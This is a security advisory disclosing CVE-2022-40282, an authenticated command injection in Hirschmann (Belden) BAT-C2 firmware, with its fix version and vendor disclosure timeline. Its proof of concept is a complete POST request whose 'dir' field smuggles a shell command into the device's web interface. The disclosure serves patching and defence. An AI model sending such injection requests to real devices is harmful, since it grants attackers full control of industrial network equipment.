[EN] Authenticated Command Injection in Hirschmann (Belden) BAT-C2

[EN] Authenticated Command Injection in Hirschmann (Belden) BAT-C2


Title: Multiple Critical Vulnerabilities
Product: Hirschmann (Belden) BAT-C2
Vulnerable version: 8.8.1.0R8
Fixed version: 09.13.01.00R04
CVE: CVE-2022-40282
Impact: High
Homepage: https://hirschmann.com/ | https://beldensolutions.com
Found: 2022-08-01


Hirschmann BAT-C2 is prone to an authenticated command injection vulnerability. This vulnerability can be used to execute arbitrary commands on the device.

Vendor description

“The Technology and Market Leader in Industrial Networking. Hirschmann™ develops innovative solutions, which are geared towards its customers’ requirements in terms of performance, efficiency and investment reliability.”

Source: https://beldensolutions.com/en/Company/About_Us/belden_brands/index.phtml

Vulnerable versions

Hirschmann (Belden) BAT-C2

Vulnerability overview

1) Authenticated Command Injection
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker.

Proof of Concept

1) Authenticated Command Injection

The command “ping 192.168.1.1” was injected to the system by using the following POST request:

POST / HTTP/1.1
Host: 192.168.3.150
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Origin: https://192.168.3.150
Authorization: Digest username=”admin”, realm=”config”, nonce=”4b63bb796252d310″, uri=”/”, algorithm=MD5, response=”dbcf03216bd8fbaa15f4b9d9d0fc1d43″, qop=auth, nc=0000000a, cnonce=”99c14d39557e691d”
Referer: https://192.168.3.150/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

ajax=FsCreateDir&dir=’%3Bping%20192.168.1.1%3B’&iehack=&submit=Create&cwd=/

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Upgrade to firmware version 09.13.01.00R04 or above.

A security bulletin for this vulnerability has been published by the vendor:
https://www.belden.com/dfsmedia/f1e38517e0cd4caa8b1acb6619890f5e/15088-source/

Workaround

None

Recommendation

CyberDanube recommends customers from Hirschmann to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.


References

Contact Timeline

  • 2022-08-03: Contacting Hirschmann via ; Belden contact suspects a duplicate. Asked contact for more information.
  • 2022-08-18: Belden representative sent more information for clarification. Highlighted differences between PoCs.
  • 2022-08-22: Belden contact confirmed the vulnerability to be no duplicate.
  • 2022-08-30: Asked for an update.
  • 2022-08-31: Vendor stated, that he will release another security bulletin for this vulnerability.
  • 2022-09-27: Asked for an update.
  • 2022-09-28: Vendor is currently testing the new firmware version and has also been assigned with an CVE number. Draft of security bulletin was also sent by the security contact.
  • 2022-10-12: Asked for an update.
  • 2022-10-13: Belden contact stated, that there is no publication date for now as another patch must be integrated.
  • 2022-10-28: Security contact informed us, that the patch will be released
    within the next two weeks.
  • 2022-11-22: Asked for a status update; Security contact stated, that the
    release was delayed due internal reasons.
  • 2022-11-23: Vendor sent the final version of the security bulletins. The release of the new firmware version will be 2022-11-28.
  • 2022-11-24: Vendor informed CyberDanube that the release of the bulletin and the firmware was done on 2022-11-23 by the marketing team. Coordinated release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.